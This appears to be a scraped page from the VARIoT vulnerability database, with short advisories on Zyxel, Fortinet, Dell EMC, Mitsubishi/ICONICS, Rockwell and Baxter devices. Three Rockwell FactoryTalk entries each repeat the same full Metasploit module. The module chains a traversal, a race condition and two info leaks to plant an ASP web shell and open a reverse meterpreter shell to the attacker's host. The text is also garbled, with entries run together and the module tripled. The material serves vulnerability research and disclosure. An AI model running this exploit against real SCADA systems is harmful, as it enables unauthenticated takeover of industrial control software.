VARIoT IoT vulnerabilities database

Zyxel Armor X1 WAP6806 1.00(ABAL.6)C0 devices allow Directory Traversal via the images/eaZy/ URI. ZyXEL Armor X1 WAP6806 is a wireless network card product of ZyXEL Corporation of Taiwan, China. The vulnerability stems from network systems or products failing to properly filter special elements in resources or file paths. An attacker could use the vulnerability to access a location outside the restricted directory

An improper neutralization of input vulnerability in FortiWLC 8.5.1 allows a remote authenticated attacker to perform a stored cross site scripting attack (XSS) via the ESS profile or the Radius Profile. FortiWLC Exists in a cross-site scripting vulnerability.Information may be obtained and tampered with. Fortinet FortiWLC is a wireless LAN controller from Fortinet. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code

An insufficient session expiration vulnerability in FortiDeceptor 3.0.0 and below allows an attacker to reuse the unexpired admin user session IDs to gain admin privileges, should the attacker be able to obtain that session ID via other, hypothetical attacks. FortiDeceptor Exists in a session deadline vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Fortinet FortiDeceptor is a network threat detection platform developed by Fortinet. The platform mainly exposes cyber threats, etc. through deception techniques. There is a security vulnerability in Fortinet FortiDeceptor 3.0.0 and earlier versions. The vulnerability is caused by the fact that the session ID does not expire after the program is logged out

GX Works2 is a PLC programming software. GX Works2 has a denial of service vulnerability. The attacker sends a constructed malicious data packet to cause illegal memory access to cause a denial of service, or may execute arbitrary code.

Changyuan Shenrui PRS-7910 Data Gateway is an Ethernet-based data gateway launched by Changyuan Shenrui Automation Automation Co., Ltd. There is a denial of service vulnerability in Changyuan Shenrui PRS-7910 data gateway. An attacker can use the vulnerability to prevent the data gateway from providing service (denial of service).

Dell EMC Unisphere for PowerMax versions prior to 9.1.0.17, Dell EMC Unisphere for PowerMax Virtual Appliance versions prior to 9.1.0.17, and PowerMax OS Release 5978 contain an authorization bypass vulnerability. An authenticated malicious user may potentially execute commands to alter or stop database statistics. Dell EMC Unisphere for PowerMax is a set of graphical management tools for PowerMax storage arrays developed by Dell

Dell EMC Unisphere for PowerMax versions prior to 9.1.0.17, Dell EMC Unisphere for PowerMax Virtual Appliance versions prior to 9.1.0.17, and PowerMax OS Release 5978 contain an improper certificate validation vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to carry out a man-in-the-middle attack by supplying a crafted certificate and intercepting the victim's traffic to view or modify a victim's data in transit. (DoS) It may be put into a state. Dell EMC Unisphere for PowerMax is a set of graphical management tools for PowerMax storage arrays developed by Dell

A specially crafted WCF client that interfaces to the may allow the execution of certain arbitrary SQL commands remotely. This affects: Mitsubishi Electric MC Works64 Version 4.02C (10.95.208.31) and earlier, all versions; Mitsubishi Electric MC Works32 Version 3.00A (9.50.255.02); ICONICS GenBroker64, Platform Services, Workbench, FrameWorX Server v10.96 and prior; ICONICS GenBroker32 v9.5 and prior. The vulnerablity allows remote attackers to execute arbitrary code on affected installations of ICONICS Genesis64. Authentication is not required to exploit this vulnerability.The specific flaw exists within the processing of requests to the TestQuery endpoint of the IcoFwxServer service. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of the current process. There is a code injection vulnerability in Mitsubishi Electric MC Works64 4.02C (10.95.208.31) and previous versions and MC Works32 3.00A (9.50.255.02) version, remote attackers can use the specially crafted message to exploit this vulnerability to execute arbitrary SQL commands and leak, tamper with internal data. ** ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided

A specially crafted communication packet sent to the affected device could cause a denial-of-service condition due to a deserialization vulnerability. This affects: Mitsubishi Electric MC Works64 Version 4.02C (10.95.208.31) and earlier, all versions; Mitsubishi Electric MC Works32 Version 3.00A (9.50.255.02); ICONICS GenBroker64, Platform Services, Workbench, FrameWorX Server v10.96 and prior; ICONICS GenBroker32 v9.5 and prior. The vulnerablity allows remote attackers to execute arbitrary code on affected installations of ICONICS Genesis64. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of PKGX files. When parsing the WbPackAndGoSettings element, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. ** ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided

A specially crafted communication packet sent to the affected systems could cause a denial-of-service condition due to improper deserialization. This issue affects: Mitsubishi Electric MC Works64 version 4.02C (10.95.208.31) and earlier, all versions; Mitsubishi Electric MC Works32 version 3.00A (9.50.255.02); ICONICS GenBroker64, Platform Services, Workbench, FrameWorX Server version 10.96 and prior; ICONICS GenBroker32 version 9.5 and prior. Several Mitsubishi Electric products contain vulnerabilities related to unreliable data deserialization.Service operation interruption (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ICONICS Genesis64. Authentication is not required to exploit this vulnerability.The specific flaw exists with the handling of serialized objects. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Mitsubishi Electric MC Works64 and MC Works32 are a set of data acquisition and monitoring system (SCADA) of Japan Mitsubishi Electric (Mitsubishi Electric) company. ** ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided

In all versions of FactoryTalk View SE, after bypassing memory corruption mechanisms found in the operating system, a local, authenticated attacker may corrupt the associated memory space allowing for arbitrary code execution. Rockwell Automation recommends applying patch 1126290. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 – Patch Roll-up for CPR9 SRx. FactoryTalk View SE Exists in a buffer error vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation FactoryTalk View SE. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of project files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process

A specially crafted communication packet sent to the affected systems could cause a denial-of-service condition or allow remote code execution. This issue affects: Mitsubishi Electric MC Works64 version 4.02C (10.95.208.31) and earlier, all versions; MC Works32 version 3.00A (9.50.255.02); ICONICS GenBroker64, Platform Services, Workbench, FrameWorX Server version 10.96 and prior; GenBroker32 version 9.5 and prior. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ICONICS Genesis64. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of indexes. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Mitsubishi Electric MC Works64 and MC Works32 are a set of data acquisition and monitoring system (SCADA) of Japan Mitsubishi Electric (Mitsubishi Electric) company. ** ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided

In Rockwell Automation FactoryTalk Services Platform, all versions, the redundancy host service (RdcyHost.exe) does not validate supplied identifiers, which could allow an unauthenticated, adjacent attacker to execute remote COM objects with elevated privileges. Rockwell Automation FactoryTalk Services Platform There is an input verification vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation FactoryTalk View SE. Authentication is not required to exploit this vulnerability.The specific flaw exists within the AddAgent method. The issue results from a lack of authentication required to instantiate a COM object on the server. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. It provides routine services for applications, such as diagnostic information, health monitoring, and real-time data access

All versions of FactoryTalk View SE disclose the hostnames and file paths for certain files within the system. A remote, authenticated attacker may be able to leverage this information for reconnaissance efforts. Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs. FactoryTalk View SE There is an information leakage vulnerability in.Information may be obtained. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of the GetHMIProjects parameter provided to hmi_isapi.dll. The issue results from a lack of authentication required to query the server. An attacker can leverage this in conjunction with other vulnerability to execute code in the context of SYSTEM. The vulnerability stems from network system or product configuration errors during operation. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits a series of vulnerabilities to achieve unauthenticated remote code execution on the Rockwell FactoryTalk View SE SCADA product as the IIS user. The attack relies on the chaining of five separate vulnerabilities. The first vulnerability is an unauthenticated project copy request, the second is a directory traversal, and the third is a race condition. In order to achieve full remote code execution on all targets, two information leak vulnerabilities are also abused. This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module 'Radek Domanski <radek.domanski[at]gmail.com>' # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'URL', 'https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami'], [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md'], [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md'], [ 'CVE', '2020-12027'], [ 'CVE', '2020-12028'], [ 'CVE', '2020-12029'], [ 'ZDI', '20-727'], [ 'ZDI', '20-728'], [ 'ZDI', '20-729'], [ 'ZDI', '20-730'], ], 'Privileged' => false, 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Payload' => { 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' } }, 'DefaultOptions' => { 'WfsDelay' => 20 }, 'Targets' => [ [ 'Rockwell Automation FactoryTalk SE', {} ] ], 'DisclosureDate' => '2020-06-22', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(80), OptString.new('SRVHOST', [true, 'IP address of the host serving the exploit']), OptInt.new('SRVPORT', [true, 'Port of the host serving the exploit on', 8080]), OptString.new('TARGETURI', [true, 'The base path to Rockwell FactoryTalk', '/rsviewse/']) ] ) register_advanced_options( [ OptInt.new('SLEEP_RACER', [true, 'Number of seconds to wait for racer thread to finish', 15]), ] ) end def send_to_factory(path) send_request_cgi({ 'uri' => normalize_uri(target_uri, path), 'method' => 'GET' }) end def check res = send_to_factory('/hmi_isapi.dll') return Exploit::CheckCode::Safe unless res && res.code == 200 # Parse version from response body # Example: Version 11.00.00.230 version = res.body.scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.') # Is returned version sound? unless version.empty? if version.length != 4 return Exploit::CheckCode::Detected end print_status("#{peer} - Detected Rockwell FactoryTalk View SE SCADA version #{version[0..3].join('.')}") if version[0].to_i == 11 && version[1].to_i == 0 && version[2].to_i == 0 && version[3].to_i == 230 # we know this exact version is vulnerable (11.00.00.230) return Exploit::CheckCode::Appears end return Exploit::CheckCode::Detected end return Exploit::CheckCode::Unknown end def on_request_uri(cli, request) if request.uri.include?(@shelly) print_good("#{peer} - Target connected, sending payload") psh = cmd_psh_payload( payload.encoded, payload.arch.first # without comspec it seems to fail, so keep it this way # remove_comspec: true ) # add double quotes for classic ASP escaping psh.gsub!('"', '""') # NOTE: ASP payloads are broken in newer Windows (Win 2012 R2, Win 10) so we need to use powershell # This is because the MSF ASP payload uses WScript.Shell.run(), which doesn't seem to work anymore... # If this module is not working on an older Windows version, try the below as payload: # payload = Msf::Util::EXE.to_exe_asp(generate_payload_exe) payload = %{<%CreateObject("WScript.Shell").exec("#{psh}")%>} send_response(cli, payload) # payload file is deleted automatically by the server once we win the race! elsif request.uri.include?(@proj_name) # Directory traversal: vulnerable asp file will land in the path we provide print_good("#{peer} - Target connected, sending file path with dir traversal") # Check the comments in the Infoleak 2 (project installation path) to understand why filename = "../SE/HMI Projects/#{@shelly}" send_response(cli, filename) end end def exploit # Infoleak 1 (project listing) print_status("#{peer} - Listing projects on the server") res = send_to_factory('/hmi_isapi.dll?GetHMIProjects') fail_with(Failure::UnexpectedReply, 'Failed to obtain project list. Bailing') unless res && res.code == 200 && res.body.include?('HMIProject') print_status("#{peer} - Received list of projects from the server") @proj_name = nil proj_path = '' xml = res.get_xml_document # Parse XML project list and check each project for installation project path xml.search('HMIProject').each do |project| # Infoleak 2 (project installation path) # In the original exploit, we used this to calculate the directory traversal path, but # Google says the path is the same for all versions since at least 2007. # Let's still abuse it to check if the project is valid. url = "/hmi_isapi.dll?GetHMIProjectPath&#{project.attributes['Name']}" res = send_to_factory(url) proj_path = res.body.strip # Check if response contains :\ that indicates a windows path next unless proj_path.include?(':\\') print_status("#{peer} - Found project path: #{proj_path}") # We only need first hit so we can quit the project parsing once we get it if project.attributes['Name'] @proj_name = project.attributes['Name'] break end end if !@proj_name fail_with(Failure::UnexpectedReply, 'Failed to get a path from the XML to drop our shell, bailing out...') end shell_path = proj_path.sub(@proj_name, '').strip print_good("#{peer} - Got a path to drop our shell: #{shell_path}") # Start http server for project copy callback http_service = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s print_status("#{peer} - Starting up our web service on #{http_service} ...") start_service({ 'Uri' => { 'Proc' => proc do |cli, req| on_request_uri(cli, req) end, # This path has to be capitalized as "RSViewSE" or else the exploit will fail! 'Path' => '/RSViewSE/' } }) # Race Condition # This is the racer thread. It will continuously access our asp file until it gets executed print_status("#{peer} - Starting racer thread, let's win this race condition!") @shelly = "#{rand_text_alpha(5..10)}.asp" racer = Thread.new do loop do res = send_to_factory("/#{@shelly}") if res.code == 200 print_good("#{peer} - We've won the race condition, shell incoming!") break end end end # Project Copy Request: target will connect to us to obtain project information. print_status("#{peer} - Initiating project copy request...") url = "/hmi_isapi.dll?StartRemoteProjectCopy&#{@proj_name}&#{rand_text_alpha(5..13)}&#{datastore['SRVHOST']}:#{datastore['SRVPORT']}&1" res = send_to_factory(url) # wait up to datastore['SLEEP_RACER'] seconds for the racer thread to finish count = 0 while count < datastore['SLEEP_RACER'] break if racer.status == false sleep(1) count += 1 end racer.exit end end

All versions of FactoryTalk View SE do not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE). Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 – Patch Roll-up for CPR9 SRx. FactoryTalk View SE There is an input verification vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation FactoryTalk View SE. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of project files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits a series of vulnerabilities to achieve unauthenticated remote code execution on the Rockwell FactoryTalk View SE SCADA product as the IIS user. The attack relies on the chaining of five separate vulnerabilities. In order to achieve full remote code execution on all targets, two information leak vulnerabilities are also abused. This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module 'Radek Domanski <radek.domanski[at]gmail.com>' # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'URL', 'https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami'], [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md'], [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md'], [ 'CVE', '2020-12027'], [ 'CVE', '2020-12028'], [ 'CVE', '2020-12029'], [ 'ZDI', '20-727'], [ 'ZDI', '20-728'], [ 'ZDI', '20-729'], [ 'ZDI', '20-730'], ], 'Privileged' => false, 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Payload' => { 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' } }, 'DefaultOptions' => { 'WfsDelay' => 20 }, 'Targets' => [ [ 'Rockwell Automation FactoryTalk SE', {} ] ], 'DisclosureDate' => '2020-06-22', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(80), OptString.new('SRVHOST', [true, 'IP address of the host serving the exploit']), OptInt.new('SRVPORT', [true, 'Port of the host serving the exploit on', 8080]), OptString.new('TARGETURI', [true, 'The base path to Rockwell FactoryTalk', '/rsviewse/']) ] ) register_advanced_options( [ OptInt.new('SLEEP_RACER', [true, 'Number of seconds to wait for racer thread to finish', 15]), ] ) end def send_to_factory(path) send_request_cgi({ 'uri' => normalize_uri(target_uri, path), 'method' => 'GET' }) end def check res = send_to_factory('/hmi_isapi.dll') return Exploit::CheckCode::Safe unless res && res.code == 200 # Parse version from response body # Example: Version 11.00.00.230 version = res.body.scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.') # Is returned version sound? unless version.empty? if version.length != 4 return Exploit::CheckCode::Detected end print_status("#{peer} - Detected Rockwell FactoryTalk View SE SCADA version #{version[0..3].join('.')}") if version[0].to_i == 11 && version[1].to_i == 0 && version[2].to_i == 0 && version[3].to_i == 230 # we know this exact version is vulnerable (11.00.00.230) return Exploit::CheckCode::Appears end return Exploit::CheckCode::Detected end return Exploit::CheckCode::Unknown end def on_request_uri(cli, request) if request.uri.include?(@shelly) print_good("#{peer} - Target connected, sending payload") psh = cmd_psh_payload( payload.encoded, payload.arch.first # without comspec it seems to fail, so keep it this way # remove_comspec: true ) # add double quotes for classic ASP escaping psh.gsub!('"', '""') # NOTE: ASP payloads are broken in newer Windows (Win 2012 R2, Win 10) so we need to use powershell # This is because the MSF ASP payload uses WScript.Shell.run(), which doesn't seem to work anymore... # If this module is not working on an older Windows version, try the below as payload: # payload = Msf::Util::EXE.to_exe_asp(generate_payload_exe) payload = %{<%CreateObject("WScript.Shell").exec("#{psh}")%>} send_response(cli, payload) # payload file is deleted automatically by the server once we win the race! elsif request.uri.include?(@proj_name) # Directory traversal: vulnerable asp file will land in the path we provide print_good("#{peer} - Target connected, sending file path with dir traversal") # Check the comments in the Infoleak 2 (project installation path) to understand why filename = "../SE/HMI Projects/#{@shelly}" send_response(cli, filename) end end def exploit # Infoleak 1 (project listing) print_status("#{peer} - Listing projects on the server") res = send_to_factory('/hmi_isapi.dll?GetHMIProjects') fail_with(Failure::UnexpectedReply, 'Failed to obtain project list. Bailing') unless res && res.code == 200 && res.body.include?('HMIProject') print_status("#{peer} - Received list of projects from the server") @proj_name = nil proj_path = '' xml = res.get_xml_document # Parse XML project list and check each project for installation project path xml.search('HMIProject').each do |project| # Infoleak 2 (project installation path) # In the original exploit, we used this to calculate the directory traversal path, but # Google says the path is the same for all versions since at least 2007. # Let's still abuse it to check if the project is valid. url = "/hmi_isapi.dll?GetHMIProjectPath&#{project.attributes['Name']}" res = send_to_factory(url) proj_path = res.body.strip # Check if response contains :\ that indicates a windows path next unless proj_path.include?(':\\') print_status("#{peer} - Found project path: #{proj_path}") # We only need first hit so we can quit the project parsing once we get it if project.attributes['Name'] @proj_name = project.attributes['Name'] break end end if !@proj_name fail_with(Failure::UnexpectedReply, 'Failed to get a path from the XML to drop our shell, bailing out...') end shell_path = proj_path.sub(@proj_name, '').strip print_good("#{peer} - Got a path to drop our shell: #{shell_path}") # Start http server for project copy callback http_service = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s print_status("#{peer} - Starting up our web service on #{http_service} ...") start_service({ 'Uri' => { 'Proc' => proc do |cli, req| on_request_uri(cli, req) end, # This path has to be capitalized as "RSViewSE" or else the exploit will fail! 'Path' => '/RSViewSE/' } }) # Race Condition # This is the racer thread. It will continuously access our asp file until it gets executed print_status("#{peer} - Starting racer thread, let's win this race condition!") @shelly = "#{rand_text_alpha(5..10)}.asp" racer = Thread.new do loop do res = send_to_factory("/#{@shelly}") if res.code == 200 print_good("#{peer} - We've won the race condition, shell incoming!") break end end end # Project Copy Request: target will connect to us to obtain project information. print_status("#{peer} - Initiating project copy request...") url = "/hmi_isapi.dll?StartRemoteProjectCopy&#{@proj_name}&#{rand_text_alpha(5..13)}&#{datastore['SRVHOST']}:#{datastore['SRVPORT']}&1" res = send_to_factory(url) # wait up to datastore['SLEEP_RACER'] seconds for the racer thread to finish count = 0 while count < datastore['SLEEP_RACER'] break if racer.status == false sleep(1) count += 1 end racer.exit end end

In all versions of FactoryTalk View SEA remote, an authenticated attacker may be able to utilize certain handlers to interact with the data on the remote endpoint since those handlers do not enforce appropriate permissions. Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs. FactoryTalk View SE There is a vulnerability in improper retention of permissions.Information may be obtained and tampered with. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of project backups. The issue results from lack of authorization prior to initiating a backup. An attacker can leverage this in conjunction with other vulnerability to execute code in the context of SYSTEM. Remote attackers can use this vulnerability to perform data interactions on remote endpoints. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits a series of vulnerabilities to achieve unauthenticated remote code execution on the Rockwell FactoryTalk View SE SCADA product as the IIS user. The attack relies on the chaining of five separate vulnerabilities. The first vulnerability is an unauthenticated project copy request, the second is a directory traversal, and the third is a race condition. In order to achieve full remote code execution on all targets, two information leak vulnerabilities are also abused. This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module 'Radek Domanski <radek.domanski[at]gmail.com>' # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'URL', 'https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami'], [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md'], [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md'], [ 'CVE', '2020-12027'], [ 'CVE', '2020-12028'], [ 'CVE', '2020-12029'], [ 'ZDI', '20-727'], [ 'ZDI', '20-728'], [ 'ZDI', '20-729'], [ 'ZDI', '20-730'], ], 'Privileged' => false, 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Payload' => { 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' } }, 'DefaultOptions' => { 'WfsDelay' => 20 }, 'Targets' => [ [ 'Rockwell Automation FactoryTalk SE', {} ] ], 'DisclosureDate' => '2020-06-22', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(80), OptString.new('SRVHOST', [true, 'IP address of the host serving the exploit']), OptInt.new('SRVPORT', [true, 'Port of the host serving the exploit on', 8080]), OptString.new('TARGETURI', [true, 'The base path to Rockwell FactoryTalk', '/rsviewse/']) ] ) register_advanced_options( [ OptInt.new('SLEEP_RACER', [true, 'Number of seconds to wait for racer thread to finish', 15]), ] ) end def send_to_factory(path) send_request_cgi({ 'uri' => normalize_uri(target_uri, path), 'method' => 'GET' }) end def check res = send_to_factory('/hmi_isapi.dll') return Exploit::CheckCode::Safe unless res && res.code == 200 # Parse version from response body # Example: Version 11.00.00.230 version = res.body.scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.') # Is returned version sound? unless version.empty? if version.length != 4 return Exploit::CheckCode::Detected end print_status("#{peer} - Detected Rockwell FactoryTalk View SE SCADA version #{version[0..3].join('.')}") if version[0].to_i == 11 && version[1].to_i == 0 && version[2].to_i == 0 && version[3].to_i == 230 # we know this exact version is vulnerable (11.00.00.230) return Exploit::CheckCode::Appears end return Exploit::CheckCode::Detected end return Exploit::CheckCode::Unknown end def on_request_uri(cli, request) if request.uri.include?(@shelly) print_good("#{peer} - Target connected, sending payload") psh = cmd_psh_payload( payload.encoded, payload.arch.first # without comspec it seems to fail, so keep it this way # remove_comspec: true ) # add double quotes for classic ASP escaping psh.gsub!('"', '""') # NOTE: ASP payloads are broken in newer Windows (Win 2012 R2, Win 10) so we need to use powershell # This is because the MSF ASP payload uses WScript.Shell.run(), which doesn't seem to work anymore... # If this module is not working on an older Windows version, try the below as payload: # payload = Msf::Util::EXE.to_exe_asp(generate_payload_exe) payload = %{<%CreateObject("WScript.Shell").exec("#{psh}")%>} send_response(cli, payload) # payload file is deleted automatically by the server once we win the race! elsif request.uri.include?(@proj_name) # Directory traversal: vulnerable asp file will land in the path we provide print_good("#{peer} - Target connected, sending file path with dir traversal") # Check the comments in the Infoleak 2 (project installation path) to understand why filename = "../SE/HMI Projects/#{@shelly}" send_response(cli, filename) end end def exploit # Infoleak 1 (project listing) print_status("#{peer} - Listing projects on the server") res = send_to_factory('/hmi_isapi.dll?GetHMIProjects') fail_with(Failure::UnexpectedReply, 'Failed to obtain project list. Bailing') unless res && res.code == 200 && res.body.include?('HMIProject') print_status("#{peer} - Received list of projects from the server") @proj_name = nil proj_path = '' xml = res.get_xml_document # Parse XML project list and check each project for installation project path xml.search('HMIProject').each do |project| # Infoleak 2 (project installation path) # In the original exploit, we used this to calculate the directory traversal path, but # Google says the path is the same for all versions since at least 2007. # Let's still abuse it to check if the project is valid. url = "/hmi_isapi.dll?GetHMIProjectPath&#{project.attributes['Name']}" res = send_to_factory(url) proj_path = res.body.strip # Check if response contains :\ that indicates a windows path next unless proj_path.include?(':\\') print_status("#{peer} - Found project path: #{proj_path}") # We only need first hit so we can quit the project parsing once we get it if project.attributes['Name'] @proj_name = project.attributes['Name'] break end end if !@proj_name fail_with(Failure::UnexpectedReply, 'Failed to get a path from the XML to drop our shell, bailing out...') end shell_path = proj_path.sub(@proj_name, '').strip print_good("#{peer} - Got a path to drop our shell: #{shell_path}") # Start http server for project copy callback http_service = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s print_status("#{peer} - Starting up our web service on #{http_service} ...") start_service({ 'Uri' => { 'Proc' => proc do |cli, req| on_request_uri(cli, req) end, # This path has to be capitalized as "RSViewSE" or else the exploit will fail! 'Path' => '/RSViewSE/' } }) # Race Condition # This is the racer thread. It will continuously access our asp file until it gets executed print_status("#{peer} - Starting racer thread, let's win this race condition!") @shelly = "#{rand_text_alpha(5..10)}.asp" racer = Thread.new do loop do res = send_to_factory("/#{@shelly}") if res.code == 200 print_good("#{peer} - We've won the race condition, shell incoming!") break end end end # Project Copy Request: target will connect to us to obtain project information. print_status("#{peer} - Initiating project copy request...") url = "/hmi_isapi.dll?StartRemoteProjectCopy&#{@proj_name}&#{rand_text_alpha(5..13)}&#{datastore['SRVHOST']}:#{datastore['SRVPORT']}&1" res = send_to_factory(url) # wait up to datastore['SLEEP_RACER'] seconds for the racer thread to finish count = 0 while count < datastore['SLEEP_RACER'] break if racer.status == false sleep(1) count += 1 end racer.exit end end

Baxter Sigma Spectrum Infusion Pumps Sigma Spectrum Infusion System v's6.x model 35700BAX & Baxter Spectrum Infusion System v's8.x model 35700BAX2 contain hardcoded passwords when physically entered on the keypad provide access to biomedical menus including device settings, view calibration values, network configuration of Sigma Spectrum WBM if installed. The vulnerability is caused by the program containing a hard-coded password

Baxter PrismaFlex all versions, PrisMax all versions prior to 3.x, The affected devices do not implement data-in-transit encryption (e.g., TLS/SSL) when configured to send treatment data to a PDMS (Patient Data Management System) or an EMR (Electronic Medical Record) system. An attacker could observe sensitive data sent from the device. Baxter PrismaFlex and PrisMax Includes a vulnerability in the transmission of important information in clear text.Information may be obtained. Baxter PrismaFlex and PrisMax are both an intensive care equipment of Baxter. An information disclosure vulnerability exists in Baxter PrismaFlex (all versions) and PrisMax versions prior to 3.x

